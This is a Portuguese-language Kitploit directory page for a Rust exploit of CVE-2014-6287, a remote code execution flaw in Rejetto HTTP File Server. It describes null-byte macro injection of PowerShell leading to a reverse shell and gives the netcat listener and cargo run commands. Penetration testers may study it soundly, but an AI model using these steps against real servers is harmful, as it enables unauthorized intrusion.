Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-6287 — Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS). | Kitploit
Ferramentas/GitHubGitHub/nika0x38/cve-2014-6287
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS).

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-6287 - Exploração de RCE no Rejetto HTTP File Server

Rust Security

Uma implementação em Rust da exploração da CVE-2014-6287 voltada para o Rejetto HTTP File Server (HFS) versões 2.3x anteriores à 2.3c.

Visão Geral da Vulnerabilidade

CVE-2014-6287 é uma vulnerabilidade crítica de execução remota de código no Rejetto HTTP File Server (HFS).

Detalhes Técnicos

  • Software Afetado: Rejetto HTTP File Server (HFS) 2.3x anterior à 2.3c
  • Tipo de Vulnerabilidade: Execução Remota de Código (RCE)
  • Pontuação CVSS: 10.0 (Crítica)
  • CWE: CWE-94 (Controle inadequado da geração de código)

Descrição

A função findMacroMarker em parserLib.pas no Rejetto HTTP File Server permite que atacantes remotos executem programas arbitrários por meio de uma sequência %00 em uma ação de pesquisa. Essa vulnerabilidade possibilita que atacantes contornem a validação de entrada e injetem código malicioso que é executado no sistema alvo.

A exploração funciona da seguinte forma:

  1. Cria uma consulta de pesquisa maliciosa contendo um byte nulo (%00)
  2. Injeta comandos PowerShell dentro dos delimitadores de macro {. e .}
  3. O servidor processa a macro e executa o código PowerShell incorporado
  4. Estabelece uma conexão reversa de shell de volta ao atacante

Uso

Passo 1: Configurar um Listener Netcat

Antes de executar a exploração, configure um listener na sua máquina atacante para capturar o shell reverso:

# Substitua <LPORT> pela porta de escuta desejada
nc -lvnp <LPORT>

Passo 2: Executar a Exploração

cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Parâmetros Obrigatórios:

  • -l, --lhost <LHOST>: Seu endereço IP local (máquina atacante)
  • -p, --lport <LPORT>: Sua porta local para o shell reverso
  • -r, --rhost <RHOST>: Endereço IP do alvo (servidor HFS vulnerável)

Parâmetros Opcionais:

  • -t, --rport <RPORT>: Porta do alvo (padrão: 80)

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. Use com responsabilidade e somente em sistemas que você possui ou para os quais tenha permissão explícita.

Baixar ferramenta